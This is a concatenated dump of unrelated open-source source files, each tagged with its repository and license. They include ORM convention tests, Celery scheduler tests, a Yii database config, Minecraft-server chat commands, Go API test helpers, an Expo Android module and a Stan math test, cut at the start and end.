[TestFixture]
public class ManyToOneConventionTests
{
private PersistenceModel model;
private IMappingProvider mapping;
private Type mappingType;
[SetUp]
public void CreatePersistenceModel()
{
model = new PersistenceModel();
}
[Test]
public void AccessShouldntBeOverwritten()
{
Mapping(x => x.Access.Field());
Convention(x => x.Access.Property());
VerifyModel(x => x.Access.ShouldEqual("field"));
}
[Test]
public void CascadeShouldntBeOverwritten()
{
Mapping(x => x.Cascade.All());
Convention(x => x.Cascade.None());
VerifyModel(x => x.Cascade.ShouldEqual("all"));
}
[Test]
public void ClassShouldntBeOverwritten()
{
Mapping(x => x.Class(typeof(string)));
Convention(x => x.CustomClass(typeof(int)));
VerifyModel(x => x.Class.GetUnderlyingSystemType().ShouldEqual(typeof(string)));
}
[Test]
public void ColumnShouldntBeOverwritten()
{
Mapping(x => x.Column("name"));
Convention(x => x.Column("xxx"));
VerifyModel(x => x.Columns.First().Name.ShouldEqual("name"));
}
[Test]
public void FetchShouldntBeOverwritten()
{
Mapping(x => x.Fetch.Join());
Convention(x => x.Fetch.Select());
VerifyModel(x => x.Fetch.ShouldEqual("join"));
}
[Test]
public void IndexShouldntBeOverwritten()
{
Mapping(x => x.Index("index"));
Convention(x => x.Index("value"));
VerifyModel(x => x.Columns.First().Index.ShouldEqual("index"));
}
[Test]
public void InsertShouldntBeOverwritten()
{
Mapping(x => x.Insert());
Convention(x => x.Not.Insert());
VerifyModel(x => x.Insert.ShouldBeTrue());
}
[Test]
public void LazyShouldntBeOverwritten()
{
Mapping(x => x.LazyLoad());
Convention(x => x.Not.LazyLoad());
VerifyModel(x => x.Lazy.ShouldEqual(true));
}
[Test]
public void NotFoundShouldntBeOverwritten()
{
Mapping(x => x.NotFound.Exception());
Convention(x => x.NotFound.Ignore());
VerifyModel(x => x.NotFound.ShouldEqual("exception"));
}
[Test]
public void NullableShouldntBeOverwritten()
{
Mapping(x => x.Nullable());
Convention(x => x.Not.Nullable());
VerifyModel(x => x.Columns.First().NotNull.ShouldBeFalse());
}
[Test]
public void PropertyRefShouldntBeOverwritten()
{
Mapping(x => x.PropertyRef("ref"));
Convention(x => x.PropertyRef("xxx"));
VerifyModel(x => x.PropertyRef.ShouldEqual("ref"));
}
[Test]
public void ReadOnlyShouldntBeOverwritten()
{
Mapping(x => x.ReadOnly());
Convention(x => x.Not.ReadOnly());
VerifyModel(x =>
{
x.Insert.ShouldBeFalse();
x.Update.ShouldBeFalse();
});
}
[Test]
public void UniqueShouldntBeOverwritten()
{
Mapping(x => x.Unique());
Convention(x => x.Not.Unique());
VerifyModel(x => x.Columns.First().Unique.ShouldBeTrue());
}
[Test]
public void UniqueKeyShouldntBeOverwritten()
{
Mapping(x => x.UniqueKey("key"));
Convention(x => x.UniqueKey("xxx"));
VerifyModel(x => x.Columns.First().UniqueKey.ShouldEqual("key"));
}
[Test]
public void UpdateShouldntBeOverwritten()
{
Mapping(x => x.Update());
Convention(x => x.Not.Update());
VerifyModel(x => x.Update.ShouldBeTrue());
}
[Test]
public void ForeignKeyShouldntBeOverwritten()
{
Mapping(x => x.ForeignKey("key"));
Convention(x => x.ForeignKey("xxx"));
VerifyModel(x => x.ForeignKey.ShouldEqual("key"));
}
#region Helpers
private void Convention(Action<IManyToOneInstance> convention)
{
model.Conventions.Add(new ReferenceConventionBuilder().Always(convention));
}
private void Mapping(Action<ManyToOnePart<ExampleParentClass>> mappingDefinition)
{
var classMap = new ClassMap<ExampleClass>();
var map = classMap.References(x => x.Parent);
mappingDefinition(map);
mapping = classMap;
mappingType = typeof(ExampleClass);
}
private void VerifyModel(Action<ManyToOneMapping> modelVerification)
{
model.Add(mapping);
var generatedModels = model.BuildMappings();
var modelInstance = generatedModels
.First(x => x.Classes.FirstOrDefault(c => c.Type == mappingType) != null)
.Classes.First()
.References.First();
modelVerification(modelInstance);
}
#endregion
}
} | MiguelMadero/fluent-nhibernate | src/FluentNHibernate.Testing/ConventionsTests/OverridingFluentInterface/ManyToOneConventionTests.cs | C# | bsd-3-clause | 6,014 |
from __future__ import unicode_literals
from celery_longterm_scheduler import get_scheduler
from celery_longterm_scheduler.conftest import CELERY
import mock
import pendulum
@CELERY.task
def echo(arg):
return arg
def test_should_store_all_arguments_needed_for_send_task(celery_worker):
# Cannot do this with a Mock, since they (technically correctly)
# differentiate recording calls between args and kw, so a call
# `send_task(1, 2, 3)` is not considered equal to
# `send_task(1, args=2, kwargs=3)`, although semantically it is the same.
def record_task(
name, args=None, kwargs=None, countdown=None, eta=None,
task_id=None, producer=None, connection=None, router=None,
result_cls=None, expires=None, publisher=None, link=None,
link_error=None, add_to_parent=True, group_id=None, retries=0,
chord=None, reply_to=None, time_limit=None, soft_time_limit=None,
root_id=None, parent_id=None, route_name=None, shadow=None,
chain=None, task_type=None, **options):
options.update(dict(
args=args, kwargs=kwargs, countdown=countdown,
eta=eta, task_id=task_id, producer=producer, connection=connection,
router=router, result_cls=result_cls, expires=expires,
publisher=publisher, link=link, link_error=link_error,
add_to_parent=add_to_parent, group_id=group_id, retries=retries,
chord=chord, reply_to=reply_to, time_limit=time_limit,
soft_time_limit=soft_time_limit, root_id=root_id,
parent_id=parent_id, route_name=route_name, shadow=shadow,
chain=chain, task_type=task_type
))
calls.append((name, options))
calls = []
with mock.patch.object(CELERY, 'send_task', new=record_task):
result = echo.apply_async(('foo',), eta=pendulum.now())
task = get_scheduler(CELERY).backend.get(result.id)
args = task[0]
kw = task[1]
# schedule() always generates an ID itself (to reuse it for the
# scheduler storage), while the normal apply_async() defers that to
# send_task(). We undo this here for comparison purposes.
kw['task_id'] = None
CELERY.send_task(*args, **kw)
scheduled_call = calls[0]
echo.apply_async(('foo',))
normal_call = calls[1]
# Special edge case, see Task._schedule() for an explanation
normal_call[1]['result_cls'] = None
assert scheduled_call == normal_call
def test_should_bypass_if_no_eta_given():
with mock.patch(
'celery_longterm_scheduler.task.Task._schedule') as schedule:
result = echo.apply_async(('foo',))
assert schedule.call_count == 0
result.get() # Be careful about test isolation
result = echo.apply_async(('foo',), eta=None)
assert schedule.call_count == 0
result.get() # Be careful about test isolation
echo.apply_async(('foo',), eta=pendulum.now())
assert schedule.call_count == 1
| ZeitOnline/celery_longterm_scheduler | src/celery_longterm_scheduler/tests/test_task.py | Python | bsd-3-clause | 3,059 |
<?php
return [
'class' => 'yii\db\Connection',
'dsn' => 'mysql:host=localhost;dbname=yii2basic',
'username' => 'root',
'password' => 'mariadb',
'charset' => 'utf8',
];
| hrydi/yii_ | config/db.php | PHP | bsd-3-clause | 189 |
/**
* Copyright (c) 2009-2015, rultor.com
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met: 1) Redistributions of source code must retain the above
* copyright notice, this list of conditions and the following
* disclaimer. 2) Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution. 3) Neither the name of the rultor.com nor
* the names of its contributors may be used to endorse or promote
* products derived from this software without specific prior written
* permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
* NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
* FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.rultor.agents.github;
import com.jcabi.aspects.Immutable;
import com.jcabi.github.Comment;
import java.io.IOException;
import java.net.URI;
/**
* Question.
*
* @author Yegor Bugayenko (yegor@teamed.io)
* @version $Id$
* @since 1.3
*/
@Immutable
public interface Question {
/**
* Empty always.
*/
Question EMPTY = new Question() {
@Override
public Req understand(final Comment.Smart comment, final URI home) {
return Req.EMPTY;
}
};
/**
* Understand it and return the request.
* @param comment The comment
* @param home Home URI of the daemon
* @return Request (or Req.EMPTY is nothing found)
* @throws IOException If fails
*/
Req understand(Comment.Smart comment, URI home) throws IOException;
}
| joansmith/rultor | src/main/java/com/rultor/agents/github/Question.java | Java | bsd-3-clause | 2,379 |
// Copyright 2009-2013 Matvei Stefarov <me@matvei.org>
using System;
using System.Collections.Generic;
using System.Linq;
namespace fCraft {
static class ChatCommands {
public static void Init() {
CommandManager.RegisterCommand( CdSay );
CommandManager.RegisterCommand( CdStaff );
CommandManager.RegisterCommand( CdIgnore );
CommandManager.RegisterCommand( CdUnignore );
CommandManager.RegisterCommand( CdMe );
CommandManager.RegisterCommand( CdRoll );
CommandManager.RegisterCommand( CdDeafen );
CommandManager.RegisterCommand( CdClear );
CommandManager.RegisterCommand( CdTimer );
CommandManager.RegisterCommand( CdReply );
}
#region Reply
static readonly CommandDescriptor CdReply = new CommandDescriptor {
Name = "Reply",
Aliases = new[] {"re"},
Category = CommandCategory.Chat,
Permissions = new[] {Permission.Chat},
IsConsoleSafe = true,
UsableByFrozenPlayers = true,
Usage = "/Re <Message>",
Help = "Replies to the last message that was sent TO you. " +
"To follow up on the last message that YOU sent, use &H@-&S instead.",
Handler = ReplyHandler
};
static void ReplyHandler( Player player, CommandReader cmd ) {
string messageText = cmd.NextAll();
if( messageText.Length == 0 ) {
player.Message( "Reply: No message to send!" );
return;
}
string targetName = player.lastPrivateMessageSender;
if( targetName != null ) {
Player targetPlayer = Server.FindPlayerExact( player,
targetName,
SearchOptions.IncludeHidden );
if( targetPlayer != null ) {
if( player.CanSee( targetPlayer ) ) {
if( targetPlayer.IsDeaf ) {
player.Message( "Cannot PM {0}&S: they are currently deaf.", targetPlayer.ClassyName );
} else if( targetPlayer.IsIgnoring( player.Info ) ) {
player.Message( "&WCannot PM {0}&W: you are ignored.", targetPlayer.ClassyName );
} else {
Chat.SendPM( player, targetPlayer, messageText );
player.MessageNow( "&Pto {0}: {1}", targetPlayer.Name, messageText );
}
} else {
player.Message( "Reply: Cannot send message; player {0}&S is offline.",
PlayerDB.FindExactClassyName( targetName ) );
if( targetPlayer.CanHear( player ) ) {
Chat.SendPM( player, targetPlayer, messageText );
player.Info.DecrementMessageWritten();
}
}
} else {
player.Message( "Reply: Cannot send message; player {0}&S is offline.",
PlayerDB.FindExactClassyName( targetName ) );
}
} else {
player.Message( "Reply: You have not sent any messages yet." );
}
}
#endregion
#region Say
static readonly
CommandDescriptor CdSay = new CommandDescriptor {
Name = "Say",
Aliases = new[] { "broadcast" },
Category = CommandCategory.Chat,
IsConsoleSafe = true,
NotRepeatable = true,
DisableLogging = true,
UsableByFrozenPlayers = true,
Permissions = new[] { Permission.Chat, Permission.Say },
Usage = "/Say Message",
Help = "Shows a message in special color, without the player name prefix. " +
"Can be used for making announcements.",
Handler = SayHandler
};
static void SayHandler( Player player, CommandReader cmd ) {
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
if( player.Can( Permission.Say ) ) {
string msg = cmd.NextAll().Trim( ' ' );
if( msg.Length > 0 ) {
Chat.SendSay( player, msg );
} else {
CdSay.PrintUsage( player );
}
} else {
player.MessageNoAccess( Permission.Say );
}
}
#endregion
#region Staff
static readonly CommandDescriptor CdStaff = new CommandDescriptor {
Name = "Staff",
Aliases = new[] { "st" },
Category = CommandCategory.Chat | CommandCategory.Moderation,
Permissions = new[] { Permission.Chat },
NotRepeatable = true,
IsConsoleSafe = true,
DisableLogging = true,
UsableByFrozenPlayers = true,
Usage = "/Staff Message",
Help = "Broadcasts your message to all operators/moderators on the server at once.",
Handler = StaffHandler
};
static void StaffHandler( Player player, CommandReader cmd ) {
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
string message = cmd.NextAll().Trim( ' ' );
if( message.Length > 0 ) {
Chat.SendStaff( player, message );
}
}
#endregion
#region Ignore / Unignore
static readonly CommandDescriptor CdIgnore = new CommandDescriptor {
Name = "Ignore",
Category = CommandCategory.Chat,
IsConsoleSafe = true,
Usage = "/Ignore [PlayerName]",
Help = "Temporarily blocks the other player from messaging you. " +
"If no player name is given, lists all ignored players.",
Handler = IgnoreHandler
};
static void IgnoreHandler( Player player, CommandReader cmd ) {
string name = cmd.Next();
if( name != null ) {
if( cmd.HasNext ) {
// too many parameters given
CdIgnore.PrintUsage( player );
return;
}
// A name was given -- let's find the target
PlayerInfo targetInfo = PlayerDB.FindPlayerInfoOrPrintMatches( player, name, SearchOptions.ReturnSelfIfOnlyMatch );
if( targetInfo == null ) return;
if( targetInfo == player.Info ) {
player.Message( "You cannot &H/Ignore&S yourself." );
return;
}
if( player.Ignore( targetInfo ) ) {
player.MessageNow( "You are now ignoring {0}", targetInfo.ClassyName );
} else {
player.MessageNow( "You are already ignoring {0}", targetInfo.ClassyName );
}
} else {
ListIgnoredPlayers( player );
}
}
static readonly CommandDescriptor CdUnignore = new CommandDescriptor {
Name = "Unignore",
Category = CommandCategory.Chat,
IsConsoleSafe = true,
Usage = "/Unignore PlayerName",
Help = "Unblocks the other player from messaging you.",
Handler = UnignoreHandler
};
static void UnignoreHandler( Player player, CommandReader cmd ) {
string name = cmd.Next();
if( name != null ) {
if( cmd.HasNext ) {
// too many parameters given
CdUnignore.PrintUsage( player );
return;
}
// A name was given -- let's find the target
PlayerInfo targetInfo = PlayerDB.FindPlayerInfoOrPrintMatches( player, name, SearchOptions.ReturnSelfIfOnlyMatch );
if( targetInfo == null ) return;
if( targetInfo == player.Info ) {
player.Message( "You cannot &H/Ignore&S (or &H/Unignore&S) yourself." );
return;
}
if( player.Unignore( targetInfo ) ) {
player.MessageNow( "You are no longer ignoring {0}", targetInfo.ClassyName );
} else {
player.MessageNow( "You are not currently ignoring {0}", targetInfo.ClassyName );
}
} else {
ListIgnoredPlayers( player );
}
}
static void ListIgnoredPlayers( Player player ) {
PlayerInfo[] ignoreList = player.IgnoreList;
if( ignoreList.Length > 0 ) {
player.MessageNow( "Ignored players: {0}", ignoreList.JoinToClassyString() );
} else {
player.MessageNow( "You are not currently ignoring anyone." );
}
}
#endregion
#region Me
static readonly CommandDescriptor CdMe = new CommandDescriptor {
Name = "Me",
Category = CommandCategory.Chat,
Permissions = new[] { Permission.Chat },
IsConsoleSafe = true,
NotRepeatable = true,
DisableLogging = true,
UsableByFrozenPlayers = true,
Usage = "/Me Message",
Help = "Sends IRC-style action message prefixed with your name.",
Handler = MeHandler
};
static void MeHandler( Player player, CommandReader cmd ) {
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
string msg = cmd.NextAll().Trim( ' ' );
if( msg.Length > 0 ) {
Chat.SendMe( player, msg );
} else {
CdMe.PrintUsage( player );
}
}
#endregion
#region Roll
static readonly CommandDescriptor CdRoll = new CommandDescriptor {
Name = "Roll",
Category = CommandCategory.Chat,
Permissions = new[] { Permission.Chat },
IsConsoleSafe = true,
Help = "Gives random number between 1 and 100.\n" +
"&H/Roll MaxNumber\n" +
"&S Gives number between 1 and max.\n" +
"&H/Roll MinNumber MaxNumber\n" +
"&S Gives number between min and max.",
Handler = RollHandler
};
static void RollHandler( Player player, CommandReader cmd ) {
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
Random rand = new Random();
int n1;
int min, max;
if( cmd.NextInt( out n1 ) ) {
int n2;
if( !cmd.NextInt( out n2 ) ) {
n2 = 1;
}
min = Math.Min( n1, n2 );
max = Math.Max( n1, n2 );
} else {
min = 1;
max = 100;
}
if( max == Int32.MaxValue - 1 ) {
player.Message( "Roll: Given values must be between {0} and {1}",
Int32.MinValue, Int32.MaxValue - 1 );
return;
}
int num = rand.Next( min, max + 1 );
Server.Message( player,
"{0}{1} rolled {2} ({3}...{4})",
player.ClassyName, Color.Silver, num, min, max );
player.Message( "{0}You rolled {1} ({2}...{3})",
Color.Silver, num, min, max );
}
#endregion
#region Deafen
static readonly CommandDescriptor CdDeafen = new CommandDescriptor {
Name = "Deafen",
Aliases = new[] { "deaf" },
Category = CommandCategory.Chat,
Help = "Blocks all chat messages from being sent to you.",
Handler = DeafenHandler
};
static void DeafenHandler( Player player, CommandReader cmd ) {
if( cmd.HasNext ) {
CdDeafen.PrintUsage( player );
return;
}
if( !player.IsDeaf ) {
for( int i = 0; i < LinesToClear; i++ ) {
player.MessageNow( "" );
}
player.MessageNow( "Deafened mode: ON" );
player.MessageNow( "You will not see ANY messages until you type &H/Deafen&S again." );
player.IsDeaf = true;
} else {
player.IsDeaf = false;
player.MessageNow( "Deafened mode: OFF" );
}
}
#endregion
#region Clear
const int LinesToClear = 30;
static readonly CommandDescriptor CdClear = new CommandDescriptor {
Name = "Clear",
UsableByFrozenPlayers = true,
Category = CommandCategory.Chat,
Help = "Clears the chat screen.",
Handler = ClearHandler
};
static void ClearHandler( Player player, CommandReader cmd ) {
if( cmd.HasNext ) {
CdClear.PrintUsage( player );
return;
}
for( int i = 0; i < LinesToClear; i++ ) {
player.Message( "" );
}
}
#endregion
#region Timer
static readonly CommandDescriptor CdTimer = new CommandDescriptor {
Name = "Timer",
Permissions = new[] { Permission.UseTimers },
IsConsoleSafe = true,
Category = CommandCategory.Chat,
Usage = "/Timer <Duration> <Message>",
Help = "Starts a timer with a given duration and message. " +
"As the timer counts down, announcements are shown globally. See also: &H/Help Timer Abort",
HelpSections = new Dictionary<string, string> {
{ "abort", "&H/Timer Abort <TimerID>\n&S" +
"Aborts a timer with the given ID number. " +
"To see a list of timers and their IDs, type &H/Timer&S (without any parameters)." }
},
Handler = TimerHandler
};
static void TimerHandler( Player player, CommandReader cmd ) {
string param = cmd.Next();
// List timers
if( param == null ) {
ChatTimer[] list = ChatTimer.TimerList.OrderBy( timer => timer.TimeLeft ).ToArray();
if( list.Length == 0 ) {
player.Message( "No timers running." );
} else {
player.Message( "There are {0} timers running:", list.Length );
foreach( ChatTimer timer in list ) {
player.Message( " #{0} \"{1}&S\" (started by {2}, {3} left)",
timer.ID, timer.Message, timer.StartedBy, timer.TimeLeft.ToMiniString() );
}
}
return;
}
// Abort a timer
if( param.Equals( "abort", StringComparison.OrdinalIgnoreCase ) ) {
int timerId;
if( cmd.NextInt( out timerId ) ) {
ChatTimer timer = ChatTimer.FindTimerById( timerId );
if( timer == null || !timer.IsRunning ) {
player.Message( "Given timer (#{0}) does not exist.", timerId );
} else {
timer.Abort();
string abortMsg = String.Format( "&Y(Timer) {0}&Y aborted a timer with {1} left: {2}",
player.ClassyName, timer.TimeLeft.ToMiniString(), timer.Message );
Chat.SendSay( player, abortMsg );
}
} else {
CdTimer.PrintUsage( player );
}
return;
}
// Start a timer
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
TimeSpan duration;
if( !param.TryParseMiniTimeSpan( out duration ) ) {
CdTimer.PrintUsage( player );
return;
}
if( duration > DateTimeUtil.MaxTimeSpan ) {
player.MessageMaxTimeSpan();
return;
}
if( duration < ChatTimer.MinDuration ) {
player.Message( "Timer: Must be at least 1 second." );
return;
}
string sayMessage;
string message = cmd.NextAll();
if( String.IsNullOrEmpty( message ) ) {
sayMessage = String.Format( "&Y(Timer) {0}&Y started a {1} timer",
player.ClassyName,
duration.ToMiniString() );
} else {
sayMessage = String.Format( "&Y(Timer) {0}&Y started a {1} timer: {2}",
player.ClassyName,
duration.ToMiniString(),
message );
}
Chat.SendSay( player, sayMessage );
ChatTimer.Start( duration, message, player.Name );
}
#endregion
}
} | 111WARLOCK111/Caznowl-Cube-Zombie | fCraft/Commands/ChatCommands.cs | C# | bsd-3-clause | 18,005 |
@javax.xml.bind.annotation.XmlSchema(namespace = "http://dto7.api.echosign", elementFormDefault = javax.xml.bind.annotation.XmlNsForm.QUALIFIED)
package echosign.api.clientv20.dto7;
| OBHITA/Consent2Share | ThirdParty/adobe-echosign-api/src/main/java/echosign/api/clientv20/dto7/package-info.java | Java | bsd-3-clause | 182 |
// Copyright 2014 - anova r&d bvba. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package freckle
import (
"fmt"
"net/http"
"net/http/httptest"
"testing"
"github.com/stretchr/testify/assert"
)
const domain = "mydomain"
const token = "abcdefghijklmnopqrstuvwxyz"
func letsTestFreckle(ts *httptest.Server) Freckle {
f := LetsFreckle(domain, token)
f.Debug(true)
f.base = ts.URL
return f
}
func authenticated(t *testing.T, method, path string, fn func(w http.ResponseWriter, r *http.Request)) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
assert.Equal(t, method, r.Method, "Should have been HTTP "+method)
assert.Equal(t, path, r.URL.Path, "Should have been HTTP URL "+path)
assert.Equal(t, domain, r.Header.Get("User-Agent"), "User-Agent header should have been set")
assert.Equal(t, token, r.Header.Get("X-FreckleToken"), "X-FreckleToken header should have been set")
fn(w, r)
})
}
func response(body string) func(http.ResponseWriter, *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, body)
}
}
func noContent() func(http.ResponseWriter, *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(204)
}
}
| gertv/go-freckle | freckle_test.go | GO | bsd-3-clause | 1,325 |
package expo.modules.application;
import android.app.Activity;
import android.content.Context;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.RemoteException;
import android.provider.Settings;
import android.util.Log;
import com.android.installreferrer.api.InstallReferrerClient;
import com.android.installreferrer.api.InstallReferrerStateListener;
import com.android.installreferrer.api.ReferrerDetails;
import org.unimodules.core.ExportedModule;
import org.unimodules.core.ModuleRegistry;
import org.unimodules.core.Promise;
import org.unimodules.core.interfaces.ActivityProvider;
import org.unimodules.core.interfaces.ExpoMethod;
import org.unimodules.core.interfaces.RegistryLifecycleListener;
import java.util.HashMap;
import java.util.Map;
public class ApplicationModule extends ExportedModule implements RegistryLifecycleListener {
private static final String NAME = "ExpoApplication";
private static final String TAG = ApplicationModule.class.getSimpleName();
private ModuleRegistry mModuleRegistry;
private Context mContext;
private ActivityProvider mActivityProvider;
private Activity mActivity;
public ApplicationModule(Context context) {
super(context);
mContext = context;
}
@Override
public String getName() {
return NAME;
}
@Override
public void onCreate(ModuleRegistry moduleRegistry) {
mModuleRegistry = moduleRegistry;
mActivityProvider = moduleRegistry.getModule(ActivityProvider.class);
mActivity = mActivityProvider.getCurrentActivity();
}
@Override
public Map<String, Object> getConstants() {
HashMap<String, Object> constants = new HashMap<>();
String applicationName = mContext.getApplicationInfo().loadLabel(mContext.getPackageManager()).toString();
String packageName = mContext.getPackageName();
constants.put("applicationName", applicationName);
constants.put("applicationId", packageName);
PackageManager packageManager = mContext.getPackageManager();
try {
PackageInfo pInfo = packageManager.getPackageInfo(packageName, 0);
constants.put("nativeApplicationVersion", pInfo.versionName);
int versionCode = (int)getLongVersionCode(pInfo);
constants.put("nativeBuildVersion", Integer.toString(versionCode));
} catch (PackageManager.NameNotFoundException e) {
Log.e(TAG, "Exception: ", e);
}
constants.put("androidId", Settings.Secure.getString(mContext.getContentResolver(), Settings.Secure.ANDROID_ID));
return constants;
}
@ExpoMethod
public void getInstallationTimeAsync(Promise promise) {
PackageManager packageManager = mContext.getPackageManager();
String packageName = mContext.getPackageName();
try {
PackageInfo info = packageManager.getPackageInfo(packageName, 0);
promise.resolve((double)info.firstInstallTime);
} catch (PackageManager.NameNotFoundException e) {
Log.e(TAG, "Exception: ", e);
promise.reject("ERR_APPLICATION_PACKAGE_NAME_NOT_FOUND", "Unable to get install time of this application. Could not get package info or package name.", e);
}
}
@ExpoMethod
public void getLastUpdateTimeAsync(Promise promise) {
PackageManager packageManager = mContext.getPackageManager();
String packageName = mContext.getPackageName();
try {
PackageInfo info = packageManager.getPackageInfo(packageName, 0);
promise.resolve((double)info.lastUpdateTime);
} catch (PackageManager.NameNotFoundException e) {
Log.e(TAG, "Exception: ", e);
promise.reject("ERR_APPLICATION_PACKAGE_NAME_NOT_FOUND", "Unable to get last update time of this application. Could not get package info or package name.", e);
}
}
@ExpoMethod
public void getInstallReferrerAsync(final Promise promise) {
final StringBuilder installReferrer = new StringBuilder();
final InstallReferrerClient referrerClient;
referrerClient = InstallReferrerClient.newBuilder(mContext).build();
referrerClient.startConnection(new InstallReferrerStateListener() {
@Override
public void onInstallReferrerSetupFinished(int responseCode) {
switch (responseCode) {
case InstallReferrerClient.InstallReferrerResponse.OK:
// Connection established and response received
try {
ReferrerDetails response = referrerClient.getInstallReferrer();
installReferrer.append(response.getInstallReferrer());
} catch (RemoteException e) {
Log.e(TAG, "Exception: ", e);
promise.reject("ERR_APPLICATION_INSTALL_REFERRER_REMOTE_EXCEPTION", "RemoteException getting install referrer information. This may happen if the process hosting the remote object is no longer available.", e);
}
promise.resolve(installReferrer.toString());
break;
case InstallReferrerClient.InstallReferrerResponse.FEATURE_NOT_SUPPORTED:
// API not available in the current Play Store app
promise.reject("ERR_APPLICATION_INSTALL_REFERRER_UNAVAILABLE", "The current Play Store app doesn't provide the installation referrer API, or the Play Store may not be installed.");
break;
case InstallReferrerClient.InstallReferrerResponse.SERVICE_UNAVAILABLE:
// Connection could not be established
promise.reject("ERR_APPLICATION_INSTALL_REFERRER_CONNECTION", "Could not establish a connection to Google Play");
break;
default:
promise.reject("ERR_APPLICATION_INSTALL_REFERRER", "General error retrieving the install referrer: response code " + responseCode);
}
referrerClient.endConnection();
}
@Override
public void onInstallReferrerServiceDisconnected() {
promise.reject("ERR_APPLICATION_INSTALL_REFERRER_SERVICE_DISCONNECTED", "Connection to install referrer service was lost.");
}
});
}
private static long getLongVersionCode(PackageInfo info) {
if (Build.VERSION.SDK_INT >= 28) {
return info.getLongVersionCode();
}
return info.versionCode;
}
}
| exponent/exponent | packages/expo-application/android/src/main/java/expo/modules/application/ApplicationModule.java | Java | bsd-3-clause | 6,171 |
#include <test/unit/math/test_ad.hpp>
TEST(MathMixMatFun, subRow) {
auto f = [](int i, int j, int k) {
return [=](const auto& y) { return stan::math::sub_row(y, i, j, k); };
};
Eigen::MatrixXd a(1, 1);
a << 3.2;
stan::test::expect_ad(f(1, 1, 0), a);
stan::test::expect_ad(f(1, 1, 1), a);
Eigen::MatrixXd b(3, 4);
b << 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12;
stan::test::expect_ad(f(1, 1, 0), b);
stan::test::expect_ad(f(1, 1, 1), b);
stan::test::expect_ad(f(1, 1, 3), b);
stan::test::expect_ad(f(1, 2, 2), b);
stan::test::expect_ad(f(3, 4, 1), b);
stan::test::expect_ad(f(2, 3, 2), b);
stan::test::expect_ad(f(1, 1, 7), b); // exception--range
stan::test::expect_ad(f(7, 1, 1), b); // exception--range
stan::test::expect_ad(f(1, 7, 1), b); // exception--range
Eigen::MatrixXd c(0, 0);
stan::test::expect_ad(f(0, 0, 0), c);
stan::test::expect_ad(f(0, 1, 0), c);
stan::test::expect_ad(f(0, 1, 1), c);
stan::test::expect_ad(f(1, 0, 0), c);
stan::test::expect_ad(f(1, 0, 1), c);
stan::test::expect_ad(f(1, 1, 0), c);
stan::test::expect_ad(f(1, 1, 1), c);
}
| stan-dev/math | test/unit/math/mix/fun/sub_row_test.cpp | C++ | bsd-3-clause | 1,112 |
/* @flow */
'use strict';
import { document } from '../dom/dom';
export default function () : boolean {
return Boolean(
(document) &&
(typeof document.querySelector !== 'undefined')
);
}
| cinecove/defunctr | lib/checks/hasQuerySelectorCheck.js | JavaScript | bsd-3-clause | 201 |
<?php
namespace backend\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use backend\models\TaxonomyItems;
/**
* TaxonomyItemsSearch represents the model behind the search form about `app\models\TaxonomyItems`.
*/
class TaxonomyItemsSearch extends TaxonomyItems
{
/**
* @inheritdoc
*/
public function rules()
{
return [
[['vid'], 'required'],
[['id', 'vid', 'pid'], 'integer'],
[['name'], 'safe'],
];
}
/**
* @inheritdoc
*/
public function scenarios()
{
// bypass scenarios() implementation in the parent class
return Model::scenarios();
}
/**
* Creates data provider instance with search query applied
*
* @param array $params
*
* @return ActiveDataProvider
*/
public function search($params)
{
$query = TaxonomyItems::find();
$dataProvider = new ActiveDataProvider([
'query' => $query,
]);
if (!($this->load($params) && $this->validate())) {
return $dataProvider;
}
$query->andFilterWhere([
'id' => $this->id,
'vid' => $this->vid,
]);
$query->andFilterWhere(['like', 'name', $this->name]);
return $dataProvider;
}
}
| babagay/razzd | backend/models/TaxonomyItemsSearch.php | PHP | bsd-3-clause | 1,352 |
# proxy module
from pyface.ui.wx.system_metrics import *
| enthought/etsproxy | enthought/pyface/ui/wx/system_metrics.py | Python | bsd-3-clause | 57 |
#ifndef __ISOLATION_MODULE_HPP__
#define __ISOLATION_MODULE_HPP__
#include <string>
namespace mesos { namespace internal { namespace slave {
class Framework;
class Slave;
class IsolationModule {
public:
static IsolationModule * create(const std::string &type);
static void destroy(IsolationModule *module);
virtual ~IsolationModule() {}
// Called during slave initialization.
virtual void initialize(Slave *slave) {}
// Called by the slave to launch an executor for a given framework.
virtual void startExecutor(Framework *framework) = 0;
// Terminate a framework's executor, if it is still running.
// The executor is expected to be gone after this method exits.
